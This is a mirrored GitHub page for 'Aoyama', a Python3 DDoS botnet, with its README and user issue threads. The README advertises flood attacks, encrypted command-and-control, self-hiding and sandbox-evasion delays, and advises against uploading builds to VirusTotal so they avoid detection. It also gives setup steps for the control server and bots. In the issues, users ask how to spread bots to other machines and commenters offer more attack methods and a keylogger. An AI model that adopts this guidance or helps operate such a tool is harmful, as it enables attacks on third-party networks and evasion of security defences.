GithubHelp home page GithubHelp logo

leeon123 / aoyama Goto Github PK

View Code? Open in Web Editor NEW
238.0 9.0 65.0 95 KB

A New version of Python3 botnet, old version: http://github.com/Leeon123/Python3-botnet

License: GNU General Public License v2.0

Python 100.00%
botnet botnet-tools botnet-lab encryption encrypted-traffic trojan ddos ddos-tool ddos-attack ddos-attacks

aoyama's Introduction

Aoyama

Aoyama is a New version of Python3 botnet, old version: http://github.com/Leeon123/Python3-botnet

Aoyama is for ddos(Maybe add more function later, such as...keylogger?)

PLS Don't scan the executable file generated from pyinstaller or py2exe on any virus scanner(such as VirusTotal), if you want to keep using this project(i will continue update the code) and not be detected

Plese run the cnc.py in linux, run in windows will have bug when login to cnc(idk why but i will try to fix it)

Fixed

Test video(OLD): https://www.youtube.com/watch?v=W4YR-cf3xD0

Virustotal (Old)

News&Features

BOT(V2):

  • Added Port Scanner
  • Improved Code
  • Added Slowloris attack
  • Improved attack process
  • Auto enable ssl when attack
  • Encrypted traffic(xor)
  • Deamon(only linux)(PS: You can use pyinstaller option '--noconsole' on windows)
  • Hide itself(linux: Deamon + delete itself | windows: Hide sys.argv[0])
  • Added single instance mode
  • Startup delay 30~90(random) seconds to bypass some sandbox scanning

CNC(V2):

  • Decrease delay of send command
  • Support Telnet Login
  • Encrypted traffic(xor)
  • Coloured CNC
  • Using login.txt to check account.(Need improve, sometime may have bugs)
  • Keep-alive connection
  • Using telnet to connect
  • Using 'ping/pong' to check bot connection status(use 'scan' to check it by yourself or it checks every 15 seconds.)

Opinion:

In my opinion, best way is using python v3.4.3 and pyinstaller v3.2. They are the best pattern i tested and used.

Usage:

Change the cnc server ip and port into the client.py at first.

Then, edit the password of cnc.py and run the cnc.py:

python3 cnc.py <port>

At Last, run the bot.py in any python3 environment(IDE, codeanywhere,etc.) or u can use pyinstaller to help u

then the Bot is online.

To login cnc, using telnet(Updated after v2) connect it then

It should be show like this:

    Username:

At this moment, u should create a file called login.txt and input the username and password in it

Like this:

    Leeon123 test

After that, Just input ur username and password.

        Username:Leeon123
        Password:test

Credits:

aoyama's People

Contributors

leeon123 avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

aoyama's Issues

how can i use

how can i Change the cnc server ip and port into the client.py
and how can i use

Adding nodes

hi, i am using void linux, how can i add nodes? i cant find any file or smth like that.
thanks

When trying the attack methods, they don't want to work.

So, everything works (setting up the CNC, connecting the bots to it etc...) but when I want to try the attack methods they don't work.
The commands go through, but when I try to hit a dstat it doesn't show any network traffic, also with tcpdump.
Do you guys maybe know what the problem could be?

Kind regards.

udp flood not working the best rn

I can see its sending traffic with wireshark. Its just for some reason it won't down the network. Or either it causes my computer to lag if I turn on to much power, what is the command you recommend for a udp flood?

not connecting

so when i run the cnc on my other device and on my main windows the client.py i see it works. But when i try to connect via telnet on my ubuntu server it doesnt work

cant connect

hi,so when i connect to my server it keeps saying {telnet: Unable to connect to remote host: Connection refused}.Can you help me plz?

Nice source.

If you need some more attack vectors (Like VSE, or ACK). I have 45 methods, and all of them are python.
Send me a message if you want them.

CPU usages

I'm not too sure whether this has occurred with anyone else, but the cpu usage is insanely high. I've tested on both 3.8 and 3.5, i'm getting 100% usage on my linux box, and 30-50% on my home device, have you noticed this as well, or is this somehow an issue on my end?
This project is really nice tho i'm not going to lie

Unstable while using python3.8 +

Exception in thread Thread-8:
Traceback (most recent call last):
File "/usr/lib/python3.9/threading.py", line 954, in _bootstrap_inner
self.run()
File "/usr/lib/python3.9/threading.py", line 892, in run
self._target(*self._args, **self._kwargs)
TypeError: SentCmd() takes 3 positional arguments but 5 were given

NO issues

Can help you to setup keylogger function, malware or ddos command (dnseyedrop etc)
Contact me for collab! =D

Attacks not working

Exception in thread Thread-12:
Traceback (most recent call last):
File "/usr/lib/python3.9/threading.py", line 954, in _bootstrap_inner
self.run()
File "/usr/lib/python3.9/threading.py", line 892, in run
self._target(*self._args, **self._kwargs)
TypeError: SentCmd() takes 3 positional arguments but 5 were given

When i run every attack in the list it doesn't start and gives me this error. Can you give me a hand please?

HELP

So, when i connect to it on putty it works but when i type !anything it says network error how do i fix it?

huh?

Exception in thread Thread-8:
Traceback (most recent call last):
File "/usr/lib/python3.9/threading.py", line 954, in _bootstrap_inner
self.run()
File "/usr/lib/python3.9/threading.py", line 892, in run
self._target(*self._args, **self._kwargs)
TypeError: SentCmd() takes 3 positional arguments but 5 were given

Getting new nodes in Windows

I really enjoy the project you have created - but Iā€™m having a problem finding Nodes / bots. Exactly how do you spread the bots to other machines? What file am I supposed to send out. It could be a possibility Iā€™m running on a Windows server.

Address already use

s.bind(('127.0.0.s.bind(('0.0.0.0',b))
OSError: [Errno 98] Address already in use

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    šŸ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. šŸ“ŠšŸ“ˆšŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ā¤ļø Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.